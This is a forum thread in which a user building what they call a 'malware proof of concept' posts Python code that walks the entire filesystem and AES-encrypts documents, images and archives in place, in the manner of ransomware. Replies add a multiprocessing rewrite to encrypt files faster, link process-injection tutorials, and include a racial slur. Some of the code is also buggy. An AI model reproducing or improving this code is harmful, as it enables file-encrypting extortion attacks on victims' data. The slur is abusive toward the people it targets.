User Controls
Multi threading in python. And a question about code injection.
-
2016-04-19 at 3:35 PM UTCSo as you guys know i'm building a malware proof of concept and to enumerate the files and encrypt them i'm using a function to ebcrypt the files from the PyCrypto modules and os.walk. Now seeing as this is a very slow process i was wondering if there were a way by which i could speed things up a bit. So multi threading came to mind and i was wondering if someone could explain to me how i can employ this with the following code.
def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
""" Encrypts a file using AES (CBC mode) with the
given key.
key:
The encryption key - a string that must be
either 16, 24 or 32 bytes long. Longer keys
are more secure.
in_filename:
Name of the input file
out_filename:
If None, '<in_filename>.enc' will be used.
chunksize:
Sets the size of the chunk which the function
uses to read and encrypt the file. Larger chunk
sizes can be faster for some files and machines.
chunksize must be divisible by 16.
"""
if not out_filename:
out_filename = in_filename + '.crypt'
iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
encryptor = AES.new(key, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += ' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
def selectfiles():
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(".docx",".pdf",".rar",".jpg",".jpeg",".png",".tiff",".zip",".7z",".exe",".mp3"):
try:
#print(os.path.join(root, file))
in_filename = os.path.join(root, file)
encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024)
except Exception as e:
#print e
pass
Above we have our function to encrypt the stuff and below we have the part that i actually want to speed up. How woud i go about this? Also can i just add file extensions to the "endswith" method like so (".docx",".pdf",".rar",".jpg",".jpeg",".png",".tif f",".zip",".7z",".exe",".mp3")?
Also, i know how DLL injectionworks and how to inject shellcode but how would i go about injecting the code from a python script or executable into a process? -
2016-04-19 at 5:33 PM UTCUse a dynamic link library to do it.
https://warroom.securestate.com/injecting-python-code-into-native-processes/
see also: https://www.christophertruncer.com/injecting-shellcode-into-a-remote-process-with-python/ -
2016-04-19 at 5:41 PM UTC
Use a dynamic link library to do it.
https://warroom.securestate.com/injecting-python-code-into-native-processes/
see also: https://www.christophertruncer.com/injecting-shellcode-into-a-remote-process-with-python/
Yeah yeah i am aware.Also, i know how DLL injectionworks and how to inject shellcode but how would i go about injecting the code from a python script or executable into a process?
obviously my script isn't a DLL and niether is it shellcode. I want to inject code from my python script into a process. I can inject code from a DLL into a process with python no problem. But i need my python code to be executed in a different process not code from a DLL. -
2016-04-19 at 7:24 PM UTCI'm not a Python programmer, but isn't Python ran inside of a sandbox enviornment like Java? If so, I think it's going to run a bit slow either way. You may want to convert everthing to C/C++ if it's not to late. If it's not ran in a sandbox enviornment, disregard.
-
2016-04-19 at 8:57 PM UTC
I'm not a Python programmer, but isn't Python ran inside of a sandbox enviornment like Java? If so, I think it's going to run a bit slow either way. You may want to convert everthing to C/C++ if it's not to late. If it's not ran in a sandbox enviornment, disregard.
The scripts are ran with the help of an interpreter but you can compile it binary with pyinstaller so i don't see how that makes python 'run in a sandbox environment'. -
2016-04-19 at 9:09 PM UTCWell, I obviously don't know shit about Python. I had thought it was always ran within it's own enviorment, like how Java is ran in the JRE.
-
2016-04-19 at 11:20 PM UTC
Well, I obviously don't know shit about Python. I had thought it was always ran within it's own enviorment, like how Java is ran in the JRE.
Sorry i didn't mean to be condescending or anything. -
2016-04-20 at 3:08 AM UTC
obviously my script isn't a DLL and niether is it shellcode. I want to inject code from my python script into a process. I can inject code from a DLL into a process with python no problem. But i need my python code to be executed in a different process not code from a DLL.
Stop trying to make things difficult.
-
2016-04-20 at 4:16 AM UTCPer the usual: shut up spectroll you dumb nigger.
​I'm not a Python programmer, but isn't Python ran inside of a sandbox enviornment like Java? If so, I think it's going to run a bit slow either way. You may want to convert everthing to C/C++ if it's not to late. If it's not ran in a sandbox enviornment, disregard.
Python is generally considered interpreted although interestingly it does run on a virtual machine of sorts, although it's very different from the JVM. It is true Python is in reasonable benchmarks slower than lower level languages, although PyCrypto is implemented in C. Much of Python's standard lib and perf intensive third party libraries are implemented in C and exposed to python through a thin layer on top of in-process interop.The scripts are ran with the help of an interpreter but you can compile it binary with pyinstaller so i don't see how that makes python 'run in a sandbox environment'.
Pyinstaller isn't really compilation in the classical sense. Most of what pyinstaller is is bundling a portable python interpreter with your program's source code, you shouldn't see any performance improvement as a process of build with pyinstaller verses running on an interpreter. I'm not sure if it's fair to call either the python VM or the JVM a "sandbox environment" since they can both make system calls and interact with the OS in the same ways a compiled binary can (although the JVM does have some provisioning for true sandboxing as in a browser environment, but no one really uses it anymore because it was a shitshow of exploits and just generally a poorly considered system) but it's true you're largely abstracted away from many architecture and OS details in such environments.
AAAAnnnnyyyyway, this is exactly the kind of place where threading makes sense. There is an unfortunate detail of CPython (the python implementation I'm sure you're using, interestingly there are other implementations of the language but you don't need to worry about that) called the global interpreter lock or GIL that makes threading in python a somewhat different proposition than in other languages. You can read about the details, it's pretty interesting, but the gist of it is that for CPU bound tasks (like crypto, but in contrast to IO bound tasks like requesting resources over the network or reading from disk (crypto in this case will use your disk but likely it will bottleneck at the CPU)) are not a good candidate for multithreading.
Fortunately you can use a better core library called multiprocessing, semantically, from your perspective, it's the same thing as threads, the difference is largely an implementation detail. The basic strategy is to build up a list of files you want to encrypt using os.walk (presumably fast enough that you can do it in the main thread without things being too slow) and stuff them into a queue (if that's not true you can parallelize the filesystem walk but I don't think it's what'll be slow), and then start up N processes consuming from the queue where N is your number of cores or thereabouts.
So in the context of your program I'd rewrite your selectfiles function something like this (warning, untested code):
from multiprocessing import Pool
def single_arg_encrypt_file(in_filename):
encrypt_file(key, in_filename)
def selectfiles():
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(".docx",".pdf",".rar",".jpg",".jpeg",".png",".tiff",".zip",".7z",".exe",".mp3"):
files_to_enc.push(os.path.join(root, file))
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
By the nature of `Pool.map` the function passed as the first arg will always be invoked with a single argument which will be an item from the queue the pool is processing (a queue of filenames in this case) so single_arg_encrypt_file is just a means of ensuring the signature of the function passed to .map is what's expected. -
2016-04-20 at 3:01 PM UTC
Per the usual: shut up spectroll you dumb nigger.
​
Python is generally considered interpreted although interestingly it does run on a virtual machine of sorts, although it's very different from the JVM. It is true Python is in reasonable benchmarks slower than lower level languages, although PyCrypto is implemented in C. Much of Python's standard lib and perf intensive third party libraries are implemented in C and exposed to python through a thin layer on top of in-process interop.
Pyinstaller isn't really compilation in the classical sense. Most of what pyinstaller is is bundling a portable python interpreter with your program's source code, you shouldn't see any performance improvement as a process of build with pyinstaller verses running on an interpreter. I'm not sure if it's fair to call either the python VM or the JVM a "sandbox environment" since they can both make system calls and interact with the OS in the same ways a compiled binary can (although the JVM does have some provisioning for true sandboxing as in a browser environment, but no one really uses it anymore because it was a shitshow of exploits and just generally a poorly considered system) but it's true you're largely abstracted away from many architecture and OS details in such environments.
AAAAnnnnyyyyway, this is exactly the kind of place where threading makes sense. There is an unfortunate detail of CPython (the python implementation I'm sure you're using, interestingly there are other implementations of the language but you don't need to worry about that) called the global interpreter lock or GIL that makes threading in python a somewhat different proposition than in other languages. You can read about the details, it's pretty interesting, but the gist of it is that for CPU bound tasks (like crypto, but in contrast to IO bound tasks like requesting resources over the network or reading from disk (crypto in this case will use your disk but likely it will bottleneck at the CPU)) are not a good candidate for multithreading.
Fortunately you can use a better core library called multiprocessing, semantically, from your perspective, it's the same thing as threads, the difference is largely an implementation detail. The basic strategy is to build up a list of files you want to encrypt using os.walk (presumably fast enough that you can do it in the main thread without things being too slow) and stuff them into a queue (if that's not true you can parallelize the filesystem walk but I don't think it's what'll be slow), and then start up N processes consuming from the queue where N is your number of cores or thereabouts.
So in the context of your program I'd rewrite your selectfiles function something like this (warning, untested code):
from multiprocessing import Pool
def single_arg_encrypt_file(in_filename):
encrypt_file(key, in_filename)
def selectfiles():
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(".docx",".pdf",".rar",".jpg",".jpeg",".png",".tiff",".zip",".7z",".exe",".mp3"):
files_to_enc.push(os.path.join(root, file))
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
By the nature of `Pool.map` the function passed as the first arg will always be invoked with a single argument which will be an item from the queue the pool is processing (a queue of filenames in this case) so single_arg_encrypt_file is just a means of ensuring the signature of the function passed to .map is what's expected.
11/10
Thorough as always, will test your code shortly.